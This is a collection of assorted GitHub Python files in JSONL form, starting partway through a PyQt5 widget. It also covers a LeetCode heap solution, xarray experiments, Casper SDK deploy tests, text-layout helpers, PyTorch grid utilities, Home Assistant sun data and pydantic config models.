button's\n self.button_add = QtWidgets.QPushButton(\"+\")\n # self.button_remove = QtWidgets.QPushButton(\"-\")\n\n # Set button size\n self.button_add.setFixedSize(16, 16)\n # self.button_remove.setFixedSize(16, 16)\n\n # Create layout\n self.layout = QtWidgets.QVBoxLayout()\n self.layout.setSpacing(0)\n self.layout.setContentsMargins(0, 0, 0, 0)\n\n # Add button's to layout\n self.layout.addWidget(self.button_add)\n # self.layout.addWidget(self.button_remove)\n\n # Use layout in widget\n self.setLayout(self.layout)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n gui = TabExample()\n sys.exit(app.exec_())","repo_name":"syedfaisalsaleeem/PyQt5-DataVisualizer-Applcation","sub_path":"MDG-PYQT/tabs_modeling_2.py","file_name":"tabs_modeling_2.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4548756910","text":"import heapq\nclass Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n freq = {}\n for x in range(len(nums)):\n if nums[x] in freq:\n freq[nums[x]]+=1\n else:\n freq[nums[x]] = 1\n freq_arr = [(-v,k) for k,v in freq.items()]\n maxheap = heapq.heapify(freq_arr)\n final_arr = []\n for x in range(k):\n final_arr.append(heapq.heappop(freq_arr)[1])\n \n return final_arr","repo_name":"hasija/leetcode","sub_path":"347. Top K Frequent Elements.py","file_name":"347. Top K Frequent Elements.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3629387544","text":"#!/usr/bin/env python3\n\nimport xarray as xr\nimport numpy as np\n\ncdr3_anch_v = np.random.randint(0, 10, 10)\ncdr3_anch_j = np.random.randint(0, 3, 5) \n\n# cdr3_anch_v[4] = None\n# cdr3_anch_j[2] = np.nan\n\nprint(type(cdr3_anch_v))\nprint(type(cdr3_anch_j))\nprint(cdr3_anch_j.dtype)\n\nds = xr.Dataset(\n {\n \"anch_cdr3__v_choice\" : ((\"v_choice\"), cdr3_anch_v),\n \"anch_cdr3__j_choice\" : ((\"j_choice\"), cdr3_anch_j),\n },\n {\n \"v_choice\" : np.arange(10),\n \"j_choice\" : np.arange(5)\n }\n )\n\nprint(ds)\n\n\na = np.ma.array([1,2,3,4,5], dtype=int)\na[1] = np.ma.masked\n#masked_array(data = [1 -- 3 4 5],\n# mask = [False True False False False],\n# fill_value = 999999)\n#\nprint(a)\nprint(a[4] + 100)\nprint(type(a[1]))\nm = a[1] + 100\nprint(type(m))\n\nbbb = np.array([2,3,5])\nprint(bbb.dtype)\n\nstr_sequence = \"AGCCTGAA\"\nsst = str_sequence[a[1]:]\nprint(str_sequence)\nprint(sst)\n\n\n","repo_name":"alfaceor/programming-examples","sub_path":"python_a/xarray/ex_dataset.py","file_name":"ex_dataset.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7214552363","text":"import os\nimport tempfile\n\nimport pycspr\n\n\ndef test_that_deploy_is_unapproved_when_instantiated(deploy_params, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n assert len(deploy.approvals) == 0\n\n\ndef test_that_deploy_can_be_approved(deploy_params, cp1, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp1))\n assert len(deploy.approvals) == 1\n assert deploy.approvals[0].signer == cp1.as_public_key\n\n\ndef test_that_deploy_can_be_approved_by_multiple_parties(deploy_params, cp1, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp1))\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp2))\n assert len(deploy.approvals) == 2\n\n\ndef test_that_deploy_approvals_are_deduplicated(deploy_params, cp1, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n for _ in range(10):\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp1))\n deploy.set_approval(pycspr.factory.create_deploy_approval(deploy, cp2))\n assert len(deploy.approvals) == 2\n\n\ndef test_that_a_deploy_can_be_written_to_fs(deploy_params, cp1, cp2):\n deploy = _create_deploy(deploy_params, cp2)\n with tempfile.TemporaryFile() as fp:\n fpath = pycspr.write_deploy(deploy, str(fp))\n assert os.path.exists(fpath)\n os.remove(fpath)\n\n\ndef test_can_write_to_and_read_from_fs(deploy_params, cp1, cp2):\n deploy_1 = _create_deploy(deploy_params, cp2)\n with tempfile.TemporaryFile() as fp:\n fpath = pycspr.write_deploy(deploy_1, str(fp))\n deploy_2 = pycspr.read_deploy(fp)\n assert isinstance(deploy_2, type(deploy_1))\n assert pycspr.serialisation.to_json(deploy_1) == \\\n pycspr.serialisation.to_json(deploy_2)\n os.remove(fpath)\n\n\ndef _create_deploy(deploy_params, cp2):\n return pycspr.factory.create_transfer(\n deploy_params,\n amount=123456789,\n target=cp2.account_key,\n correlation_id=1\n )\n","repo_name":"casper-network/casper-python-sdk","sub_path":"tests/test_deploy_lifecycle.py","file_name":"test_deploy_lifecycle.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"70"}
+{"seq_id":"12346545054","text":"from __future__ import annotations\n\nimport typing\n\nfrom .. import spec\n\n\ndef hjustify(\n text: str,\n justification: spec.HorizontalJustification,\n width: int,\n) -> str:\n\n # account for rich formatting\n if '[' in text:\n import rich.text\n\n plain_width = rich.text.Text.from_markup(text).cell_len\n width += len(text) - plain_width\n\n if width < len(text):\n return text[:width]\n\n if justification == 'left':\n return text.ljust(width)\n elif justification == 'right':\n return text.rjust(width)\n elif justification == 'center':\n return text.center(width)\n elif justification == 'raw':\n return text[:width].ljust(width)\n else:\n raise Exception('unknown justification: ' + str(justification))\n\n\ndef vjustify(\n text: str,\n justification: spec.VerticalJustification,\n height: int,\n) -> str:\n\n n_lines = text.count('\\n') + 1\n\n # check if exceeds height\n if n_lines > height:\n return '\\n'.join(text.split('\\n')[:height])\n\n missing = height - n_lines\n if justification == 'top':\n return text + '\\n' * missing\n elif justification == 'bottom':\n return '\\n' * missing + text\n elif justification == 'center':\n top = int(missing / 2)\n bottom = missing - top\n return '\\n' * top + text + '\\n' * bottom\n else:\n raise Exception('unknown justification: ' + str(justification))\n\n\ndef concatenate_blocks(\n blocks: typing.Sequence[str | typing.Sequence[str]],\n *,\n gap: int | str | None = None,\n) -> str:\n \"\"\"concatenate blocks of text horizontally\"\"\"\n\n # split blocks into lines\n blocks_lines: typing.MutableSequence[typing.Sequence[str]] = []\n for block in blocks:\n if isinstance(block, str):\n blocks_lines.append(block.split('\\n'))\n else:\n blocks_lines.append(block)\n n_lines = len(blocks_lines[0])\n for block_lines in blocks_lines:\n if len(block_lines) != n_lines:\n raise Exception(\n 'every block needs to have the same number of lines'\n )\n\n if gap is None:\n gap = ''\n elif isinstance(gap, int):\n gap = ' ' * gap\n elif isinstance(gap, str):\n pass\n else:\n raise Exception('unknown gap format: ' + str(type(gap)))\n\n # concatenate into new lines\n new_lines = []\n for pieces in zip(*blocks_lines):\n new_lines.append(gap.join(pieces))\n\n return '\\n'.join(new_lines)\n\n\ndef indent_block(block: str, indent: typing.Union[str, int, None]) -> str:\n indent = indent_to_str(indent)\n lines = block.split('\\n')\n new_lines = [indent + line for line in lines]\n return '\\n'.join(new_lines)\n\n\ndef indent_to_str(indent: typing.Union[str, int, None]) -> str:\n \"\"\"convert input into an indent, whether a str or an int number of spaces\n\n useful for user facing functions with flexible input constraints\n \"\"\"\n if indent is None:\n return ''\n elif isinstance(indent, int):\n return ' ' * indent\n elif isinstance(indent, str):\n return indent\n else:\n raise Exception('unknown indent format')\n","repo_name":"sslivkoff/toolstr","sub_path":"toolstr/formats/positional_formats.py","file_name":"positional_formats.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"27244112064","text":"import os\nimport copy\nimport numpy as np\nfrom os.path import isfile\nimport torch\nimport binvox_rw\nimport torch.nn.functional as F\nEPS = 1e-6\n\nuse_cuda = torch.cuda.is_available()\nDEVICE = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\ndef assert_same_shape(t1, t2):\n for (x, y) in zip(list(t1.shape), list(t2.shape)):\n assert(x==y)\n\ndef print_stats_py(name, tensor):\n print('%s (%s) min = %.2f, mean = %.2f, max = %.2f' % (name, tensor.dtype, torch.min(tensor), torch.mean(tensor), torch.max(tensor)))\n\ndef tensor2summ(tensor, permute_dim=False):\n # if permute_dim = True:\n # for 2D tensor, assume input is torch format B x S x C x H x W, we want B x S x H x W x C\n # for 3D tensor, assume input is torch format B x S x C x H x W x D, we want B x S x H x W x C x D\n # and finally unbind the sequeence dimension and return a list of [B x H x W x C].\n assert(tensor.ndim == 5 or tensor.ndim == 6)\n assert(tensor.size()[1] == 2) #sequense length should be 2\n if permute_dim:\n if tensor.ndim == 6: #3D tensor\n tensor = tensor.permute(0, 1, 3, 4, 5, 2)\n elif tensor.ndim == 5: #2D tensor\n tensor = tensor.permute(0, 1, 3, 4, 2)\n\n tensor = torch.unbind(tensor, dim=1)\n return tensor\n\ndef normalize_single(d):\n # d is a whatever shape torch tensor\n dmin = torch.min(d)\n dmax = torch.max(d)\n d = (d-dmin)/(EPS+(dmax-dmin))\n return d\n\ndef normalize(d):\n # d is B x whatever. normalize within each element of the batch\n out = torch.zeros(d.size()) # (1, 3, 32, 32)\n if d.is_cuda:\n out = out.cuda()\n B = list(d.size())[0]\n for b in range(B):\n out[b] = normalize_single(d[b])\n return out # this makes embedding to lie between (0 and 1)\n\ndef reduce_masked_mean(x, mask, dim=None, keepdim=False):\n # x and mask are the same shape\n # returns shape-1\n # axis can be a list of axes\n assert(x.size() == mask.size())\n prod = x*mask # would become zero in certain locations\n if dim is None:\n numer = torch.sum(prod)\n denom = EPS+torch.sum(mask)\n\n else:\n numer = torch.sum(prod, dim=dim, keepdim=keepdim)\n denom = EPS+torch.sum(mask, dim=dim, keepdim=keepdim)\n\n mean = numer/denom\n return mean\n\ndef pack_seqdim(tensor, B):\n shapelist = list(tensor.shape)\n B_, S = shapelist[:2]\n assert(B==B_)\n otherdims = shapelist[2:]\n tensor = torch.reshape(tensor, [B*S]+otherdims)\n return tensor\n\ndef unpack_seqdim(tensor, B):\n shapelist = list(tensor.shape)\n BS = shapelist[0]\n assert(BS%B==0)\n otherdims = shapelist[1:]\n S = int(BS/B)\n tensor = torch.reshape(tensor, [B,S]+otherdims)\n return tensor\n\ndef gridcloud3D(B, Z, Y, X, norm=False, device=None):\n # we want to sample for each location in the grid\n grid_z, grid_y, grid_x = meshgrid3D(B, Z, Y, X, norm=norm, device=device)\n x = torch.reshape(grid_x, [B, -1])\n y = torch.reshape(grid_y, [B, -1])\n z = torch.reshape(grid_z, [B, -1])\n # these are B x N\n xyz = torch.stack([x, y, z], dim=2)\n # this is B x N x 3\n return xyz\n\ndef gridcloud3D_py(Z, Y, X):\n # we want to sample for each location in the grid\n grid_z, grid_y, grid_x = meshgrid3D_py(Z, Y, X) # 0 - 31 is broken into 32 parts\n x = np.reshape(grid_x, [-1])\n y = np.reshape(grid_y, [-1])\n z = np.reshape(grid_z, [-1])\n # these are N = 32x32x32\n xyz = np.stack([x, y, z], axis=1)\n # this is N x 3\n return xyz\n\ndef meshgrid2D_py(Y, X):\n grid_y = np.linspace(0.0, Y-1, Y)\n grid_y = np.reshape(grid_y, [Y, 1])\n grid_y = np.tile(grid_y, [1, X])\n\n grid_x = np.linspace(0.0, X-1, X)\n grid_x = np.reshape(grid_x, [1, X])\n grid_x = 
np.tile(grid_x, [Y, 1])\n\n return grid_y, grid_x\n\ndef gridcloud2D_py(Y, X):\n # we want to sample for each location in the grid\n grid_y, grid_x = meshgrid2D_py(Y, X)\n x = np.reshape(grid_x, [-1])\n y = np.reshape(grid_y, [-1])\n # these are N\n xy = np.stack([x, y], axis=1)\n # this is N x 2\n return xy\n\ndef normalize_grid3D(grid_z, grid_y, grid_x, Z, Y, X):\n # make things in [-1,1]\n grid_z = 2.0*(grid_z / float(Z-1)) - 1.0\n grid_y = 2.0*(grid_y / float(Y-1)) - 1.0\n grid_x = 2.0*(grid_x / float(X-1)) - 1.0\n return grid_z, grid_y, grid_x\n\ndef normalize_grid2D(grid_y, grid_x, Y, X):\n # make things in [-1,1]\n grid_y = 2.0*(grid_y / float(Y-1)) - 1.0\n grid_x = 2.0*(grid_x / float(X-1)) - 1.0\n return grid_y, grid_x\n\ndef normalize_gridcloud(xyz, Z, Y, X):\n # make things in [-1,1]\n x = xyz[...,0]\n y = xyz[...,1]\n z = xyz[...,2]\n\n z = 2.0*(z / float(Z-1)) - 1.0\n y = 2.0*(y / float(Y-1)) - 1.0\n x = 2.0*(x / float(X-1)) - 1.0\n\n xyz = torch.stack([x,y,z], dim=-1)\n return xyz\n\ndef normalize_gridcloud3D(xyz, Z, Y, X, clamp_extreme=True):\n # make things in [-1,1]\n x = xyz[...,0]\n y = xyz[...,1]\n z = xyz[...,2]\n\n z = 2.0*(z / float(Z-1)) - 1.0\n y = 2.0*(y / float(Y-1)) - 1.0\n x = 2.0*(x / float(X-1)) - 1.0\n\n xyz = torch.stack([x,y,z], dim=-1)\n\n if clamp_extreme:\n xyz = torch.clamp(xyz, min=-2.0, max=2.0)\n return xyz\n\ndef meshgrid3D_yxz(B, Y, X, Z):\n # returns a meshgrid sized B x Y x X x Z\n # this ordering makes sense since usually Y=height, X=width, Z=depth\n\n\tgrid_y = torch.linspace(0.0, Y-1, Y)\n\tgrid_y = torch.reshape(grid_y, [1, Y, 1, 1])\n\tgrid_y = grid_y.repeat(B, 1, X, Z)\n\n\tgrid_x = torch.linspace(0.0, X-1, X)\n\tgrid_x = torch.reshape(grid_x, [1, 1, X, 1])\n\tgrid_x = grid_x.repeat(B, Y, 1, Z)\n\n\tgrid_z = torch.linspace(0.0, Z-1, Z)\n\tgrid_z = torch.reshape(grid_z, [1, 1, 1, Z])\n\tgrid_z = grid_z.repeat(B, Y, X, 1)\n\n\treturn grid_y, grid_x, grid_z\n\ndef meshgrid2D(B, Y, X, stack=False, norm=False, device=DEVICE):\n # returns a meshgrid sized B x Y x X\n\n grid_y = torch.linspace(0.0, Y-1, Y, device=device)\n grid_y = torch.reshape(grid_y, [1, Y, 1])\n grid_y = grid_y.repeat(B, 1, X)\n\n grid_x = torch.linspace(0.0, X-1, X, device=device)\n grid_x = torch.reshape(grid_x, [1, 1, X])\n grid_x = grid_x.repeat(B, Y, 1)\n\n if norm:\n grid_y, grid_x = normalize_grid2D(\n grid_y, grid_x, Y, X)\n\n if stack:\n # note we stack in xy order\n # (see https://pytorch.org/docs/stable/nn.functional.html#torch.nn.functional.grid_sample)\n grid = torch.stack([grid_x, grid_y], dim=-1)\n return grid\n else:\n return grid_y, grid_x\n\ndef meshgrid3D(B, Z, Y, X, stack=False, norm=False, device=None):\n # returns a meshgrid sized B x Z x Y x X\n if device is not None:\n grid_z = torch.linspace(0.0, Z-1, Z).to(device).contiguous()\n grid_y = torch.linspace(0.0, Y-1, Y).to(device).contiguous()\n grid_x = torch.linspace(0.0, X-1, X).to(device).contiguous()\n else:\n grid_z = torch.linspace(0.0, Z-1, Z, device=DEVICE).contiguous()\n grid_y = torch.linspace(0.0, Y-1, Y, device=DEVICE).contiguous()\n grid_x = torch.linspace(0.0, X-1, X, device=DEVICE).contiguous()\n\n grid_z = torch.reshape(grid_z, [1, Z, 1, 1])\n grid_z = grid_z.repeat(B, 1, Y, X)\n\n grid_y = torch.reshape(grid_y, [1, 1, Y, 1])\n grid_y = grid_y.repeat(B, Z, 1, X)\n\n grid_x = torch.reshape(grid_x, [1, 1, 1, X])\n grid_x = grid_x.repeat(B, Z, Y, 1)\n\n if norm:\n grid_z, grid_y, grid_x = normalize_grid3D(\n grid_z, grid_y, grid_x, Z, Y, X)\n\n if stack:\n # note we stack in xyz order\n # 
(see https://pytorch.org/docs/stable/nn.functional.html#torch.nn.functional.grid_sample)\n        grid = torch.stack([grid_x, grid_y, grid_z], dim=-1)\n        return grid\n    else:\n        return grid_z, grid_y, grid_x\n\ndef meshgrid3D_py(Z, Y, X, stack=False, norm=False):\n    grid_z = np.linspace(0.0, Z-1, Z)\n    grid_z = np.reshape(grid_z, [Z, 1, 1])\n    grid_z = np.tile(grid_z, [1, Y, X])\n\n    grid_y = np.linspace(0.0, Y-1, Y)\n    grid_y = np.reshape(grid_y, [1, Y, 1])\n    grid_y = np.tile(grid_y, [Z, 1, X])\n\n    grid_x = np.linspace(0.0, X-1, X)\n    grid_x = np.reshape(grid_x, [1, 1, X])\n    grid_x = np.tile(grid_x, [Z, Y, 1])\n\n    if norm:\n        grid_z, grid_y, grid_x = normalize_grid3D(\n            grid_z, grid_y, grid_x, Z, Y, X)\n\n    if stack:\n        # note we stack in xyz order\n        # (see https://pytorch.org/docs/stable/nn.functional.html#torch.nn.functional.grid_sample)\n        grid = np.stack([grid_x, grid_y, grid_z], axis=-1)  # numpy's stack takes axis=, not torch's dim=\n        return grid\n    else:\n        return grid_z, grid_y, grid_x\n\ndef sub2ind(height, width, y, x):\n    return y*width + x\n\ndef sql2_on_axis(x, axis, keepdim=True):\n    return torch.sum(x**2, axis, keepdim=keepdim)\n\ndef l2_on_axis(x, axis, keepdim=True):\n    return torch.sqrt(EPS + sql2_on_axis(x, axis, keepdim=keepdim))\n\ndef l1_on_axis(x, axis, keepdim=True):\n    return torch.sum(torch.abs(x), axis, keepdim=keepdim)\n\ndef sub2ind3D(depth, height, width, d, h, w):\n    # when gathering/scattering with these inds, the tensor should be Z x Y x X\n    return d*height*width + h*width + w\n\ndef gradient3D(x, absolute=False, square=False):\n    # x should be B x C x D x H x W\n    dz = x[:, :, 1:, :, :] - x[:, :, :-1, :, :]\n    dy = x[:, :, :, 1:, :] - x[:, :, :, :-1, :]\n    dx = x[:, :, :, :, 1:] - x[:, :, :, :, :-1]\n\n    # zeros = tf.zeros_like(x)\n    zeros = torch.zeros_like(x)\n    zero_z = zeros[:, :, 0:1, :, :]\n    zero_y = zeros[:, :, :, 0:1, :]\n    zero_x = zeros[:, :, :, :, 0:1]\n    dz = torch.cat([dz, zero_z], axis=2)\n    dy = torch.cat([dy, zero_y], axis=3)\n    dx = torch.cat([dx, zero_x], axis=4)\n    if absolute:\n        dz = torch.abs(dz)\n        dy = torch.abs(dy)\n        dx = torch.abs(dx)\n    if square:\n        dz = dz ** 2\n        dy = dy ** 2\n        dx = dx ** 2\n    return dz, dy, dx\n\ndef gradient2D(x, absolute=False, square=False):\n    # x should be B x C x H x W\n    dh = x[:, :, 1:, :] - x[:, :, :-1, :]\n    dw = x[:, :, :, 1:] - x[:, :, :, :-1]\n\n    # zeros = tf.zeros_like(x)\n    zeros = torch.zeros_like(x)\n    zero_h = zeros[:, :, 0:1, :]\n    zero_w = zeros[:, :, :, 0:1]\n    dh = torch.cat([dh, zero_h], axis=2)\n    dw = torch.cat([dw, zero_w], axis=3)\n    if absolute:\n        dh = torch.abs(dh)\n        dw = torch.abs(dw)\n    if square:\n        dh = dh ** 2\n        dw = dw ** 2\n    return dh, dw\n\ndef matmul2(mat1, mat2):\n    return torch.matmul(mat1, mat2)\n\ndef matmul3(mat1, mat2, mat3):\n    return torch.matmul(mat1, torch.matmul(mat2, mat3))\n\ndef downsample(img, factor):\n    down = torch.nn.AvgPool2d(factor)\n    img = down(img)\n    return img\n\ndef l2_normalize(x, dim=1):\n    # dim1 is the channel dim\n    return F.normalize(x, p=2, dim=dim)\n\ndef assert_unpacked(B, S, shape_tuple):\n    assert shape_tuple[0] == B, \"batch dimension does not match of unpacked\"\n    assert shape_tuple[1] == S, \"sequence dimension does not match of unpacked\"\n\ndef assert_packed(B, S, shape_tuple):\n    assert shape_tuple[0] == B*S, \"in packing the 0-th dimension does not equal B*S\"\n\ndef get_params(model_part):\n    return [copy.deepcopy(p) for p in model_part.parameters()]\n\ndef check_equal(a, b):\n    # first check that the length of the two list are equal\n    assert len(a) == len(b), \"the list sizes are not equal for sure failing\"\n    res = [torch.equal(p1, p2) for p1, p2 in zip(a, b)]\n    return all(res)\n\ndef check_notequal(a, b):\n    # here I still check that the lists are equal in length, since same subnet\n    # params are being checked for not equality here\n    assert len(a) == len(b), \"same network params should have same length\"\n    res = [torch.equal(p1, p2) for p1, p2 in zip(a, b)]\n    return not all(res)\n\ndef to_numpy(a):\n    ## a is a tensor\n    return a.cpu().numpy()\n\ndef save_voxel(voxel_, filename, THRESHOLD=0.5):\n    S1 = voxel_.shape[2]\n    S2 = voxel_.shape[1]\n    S3 = voxel_.shape[0]\n\n    binvox_obj = binvox_rw.Voxels(\n        voxel_ >= THRESHOLD, # I am already in xyz\n        dims = [S1, S2, S3],\n        translate = [0.0, 0.0, 0.0],\n        scale = 1.0,\n        axis_order = 'xyz'\n    )\n    with open(filename, \"wb\") as f:\n        binvox_obj.write(f)\n\ndef get_cuboid_corners(centers, D, H, W, maxD, maxH, maxW):\n    \"\"\"\n    centers is B, N, C (the grid coordinates I will consider centers)\n    D, H, W: is the depth, height and width of the cuboid\n    \"\"\"\n    B, N, C = list(centers.shape)\n    rounded_centers = torch.round(centers)\n    assert rounded_centers[:, :, 0].max() <= maxW-1\n    assert rounded_centers[:, :, 1].max() <= maxH-1\n    assert rounded_centers[:, :, 2].max() <= maxD-1\n    assert rounded_centers[:, :, 0].min() >= 0\n    assert rounded_centers[:, :, 1].min() >= 0\n    assert rounded_centers[:, :, 2].min() >= 0\n\n    left_x = rounded_centers[:, :, 0] - W\n    right_x = rounded_centers[:, :, 0] + W\n    forward_y = rounded_centers[:, :, 1] + H\n    backward_y = rounded_centers[:, :, 1] - H\n    up_z = rounded_centers[:, :, 2] + D\n    down_z = rounded_centers[:, :, 2] - D\n\n    back_bottom_left_corner = torch.stack([down_z, backward_y, left_x], dim=2)\n    back_top_left_corner = torch.stack([up_z, backward_y, left_x], dim=2)\n    back_bottom_right_corner = torch.stack([down_z, backward_y, right_x], dim=2)\n    back_top_right_corner = torch.stack([up_z, backward_y, right_x], dim=2)\n    front_bottom_left_corner = torch.stack([down_z, forward_y, left_x], dim=2)\n    front_top_left_corner = torch.stack([up_z, forward_y, left_x], dim=2)\n    front_bottom_right_corner = torch.stack([down_z, forward_y, right_x], dim=2)\n    front_top_right_corner = torch.stack([up_z, forward_y, right_x], dim=2)\n\n    corners = torch.stack([back_bottom_left_corner, back_top_left_corner, back_bottom_right_corner,\\\n                           back_top_right_corner, front_bottom_left_corner, front_top_left_corner,\\\n                           front_bottom_right_corner, front_top_right_corner], dim=2)\n\n    return corners  # the IPython embed() debugging stub that sat here never returned the computed corners\n\nif __name__ == '__main__':\n    # test parameter not changing function\n    paramA = torch.randn(32, 32, 32, requires_grad=True)\n    paramB = copy.deepcopy(paramA)\n    paramC = torch.randn(32, 32, 32, requires_grad=True)\n    paramA, paramB, paramC = [paramA], [paramB], [paramC]\n\n    res = check_equal(paramA, paramB) ## true\n    res1 = check_equal(paramA, paramC) ## false\n    res2 = check_equal(paramB, paramC) ## false\n    res3 = check_notequal(paramA, paramC) ## true\n    res4 = check_notequal(paramB, paramC) ## true\n    res5 = check_notequal(paramA, paramB) ## false\n\n    print(res, res1, res2, res3, res4, res5)\n\n    Z, Y, X = 32, 32, 32\n    grid = gridcloud3D_py(Z, Y, X)\n    from IPython import embed; embed()\n","repo_name":"YunchuZhang/Visually-Grounded-Library-of-Behaviors","sub_path":"pytorch_disco/utils/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":14494,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"22535562963","text":"#WAP to take name and the contact number from user and check whether it is correct value or not.\r\n\r\n\r\n\r\nname=input(\"Enter your name: \\n\")\r\n\r\nnumber=input(\"Enter your mobile number: \\n\")\r\n\r\nif (len(name)>2 and len(number)==10):\r\n print(\"correct details\")\r\nelse:\r\n print(\"wrong details\")\r\n\r\n\r\n \r\n","repo_name":"ImOmkar/Python","sub_path":"assign10.py","file_name":"assign10.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1198749345","text":"\"\"\"Fetch sun data.\"\"\"\nfrom datetime import date, timedelta, datetime\nimport pandas as pd\nfrom homeassistant.helpers.sun import get_astral_location\nfrom homeassistant.core import HomeAssistant\n\n\nclass SunData:\n \"\"\"Access local sun data.\"\"\"\n\n def __init__(self, timezone, hass: HomeAssistant) -> None: # noqa: D107\n self.hass = hass\n location, elevation = get_astral_location(self.hass)\n self.location = location # astral.location.Location\n self.elevation = elevation\n self.timezone = timezone\n\n @property\n def times(self) -> pd.DatetimeIndex:\n \"\"\"Define time interval.\"\"\"\n start_date = date.today()\n end_date = start_date + timedelta(days=1)\n\n times = pd.date_range(\n start=start_date, end=end_date, freq=\"5min\", tz=self.timezone\n )\n return times\n\n @property\n def solar_azimuth(self) -> list:\n \"\"\"Create list with solar azimuth data per 5 minutes.\"\"\"\n index = 0\n azi_list = []\n for _i in self.times:\n azi_list.append(\n self.location.solar_azimuth(self.times[index], self.elevation)\n )\n index += 1\n return azi_list\n\n @property\n def solar_elevation(self) -> list:\n \"\"\"Create list with solar elevation data per 5 minutes.\"\"\"\n index = 0\n ele_list = []\n for _i in self.times:\n ele_list.append(\n self.location.solar_elevation(self.times[index], self.elevation)\n )\n index += 1\n return ele_list\n\n def sunset(self) -> datetime:\n \"\"\"Fetch sunset time.\"\"\"\n return self.location.sunset(date.today(), local=False)\n\n # def df_today(self)-> pd.DataFrame:\n # \"\"\"Create dataframe with azimuth and elevation data\"\"\"\n # df_today = pd.DataFrame({\"azimuth\":self.solar_azimuth, \"elevation\":self.solar_elevation})\n # df_today = df_today.set_index(self.times)\n # return df_today\n","repo_name":"basbruss/adaptive-cover","sub_path":"custom_components/adaptive_cover/sun.py","file_name":"sun.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"5939632241","text":"import uuid\nfrom datetime import datetime\nfrom typing import Optional, List\nimport pytz\n\nfrom pydantic import BaseModel, Field, root_validator\n\n\nclass SASchedule(BaseModel):\n sa_id: str = Field(...)\n on: List[datetime] = Field(...)\n off: List[datetime] = Field(...)\n\n\nclass SensorSchedule(BaseModel):\n sensor_id: str = Field(...)\n interval: float = Field(...)\n\n\nclass RASchedule(BaseModel):\n ra_id: str = Field(...)\n interval: float = Field(...)\n threshold: float = Field(...)\n duration: float = Field(...)\n threshold_type: int = Field(...) # 1: ceiling, 0: floor\n\n\nclass Config(BaseModel):\n id: str = Field(default_factory=uuid.uuid4, alias=\"_id\")\n name: str = Field(...)\n sensor_schedule: List[SensorSchedule] = Field(...)\n ra_schedule: List[RASchedule] = Field(...)\n sa_schedule: List[SASchedule] = Field(...)\n created_at: datetime = datetime.now(pytz.timezone(\"US/Eastern\"))\n updated_at: datetime = datetime.now(pytz.timezone(\"US/Eastern\"))\n\n class Config:\n allow_population_by_field_name = True\n schema_extra = {\n \"example\": {\n \"_id\": \"b67cd1cf-e113-40cf-a293-ba80251e03ce\",\n \"name\": \"TestConfig\",\n \"sensor_schedule\": [\n {\n \"sensor_id\": \"66608a32-a24c-4b70-ae2c-c46c586ea0c3\",\n \"interval\": 300.0,\n }\n ],\n \"ra_schedule\": [\n {\n \"ra_id\": \"5e9b44c7-970a-41f0-8ef4-e4dbf82f00c3\",\n \"interval\": 1200.0,\n \"threshold\": 7.5,\n \"duration\": 5.0,\n \"threshold_type\": 1,\n }\n ],\n \"sa_schedule\": [\n {\n \"sa_id\": \"15a2a241-cf21-4365-af45-3d140712f2b8\",\n \"on\": [\n \"2023-02-17T08:09:50+00:00\",\n \"2023-02-17T16:09:50+00:00\",\n \"2023-02-17T20:09:50+00:00\",\n ],\n \"off\": [\n \"2023-02-17T08:29:50+00:00\",\n \"2023-02-17T16:29:50+00:00\",\n \"2023-02-17T20:29:50+00:00\",\n ],\n }\n ],\n \"created_at\": \"2023-02-18T21:15:12.005399\",\n \"updated_at\": \"2023-02-18T21:15:12.005400\",\n }\n }\n\n @root_validator\n def number_validator(cls, values):\n values[\"updated_at\"] = datetime.now(pytz.timezone(\"US/Eastern\"))\n return values\n\n\nclass ConfigUpdate(BaseModel):\n name: Optional[str]\n sensor_schedule: Optional[List[SensorSchedule]]\n ra_schedule: Optional[List[RASchedule]]\n sa_schedule: Optional[List[SASchedule]]\n updated_at: datetime = datetime.now(pytz.timezone(\"US/Eastern\"))\n\n class Config:\n schema_extra = {\n \"example\": {\n \"name\": \"Config 1\",\n \"sensor_schedule\": [{\"sensor_id\": \"abc\", \"interval\": 400}],\n }\n }\n","repo_name":"Olin-Hydro/hydrangea","sub_path":"app/models/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
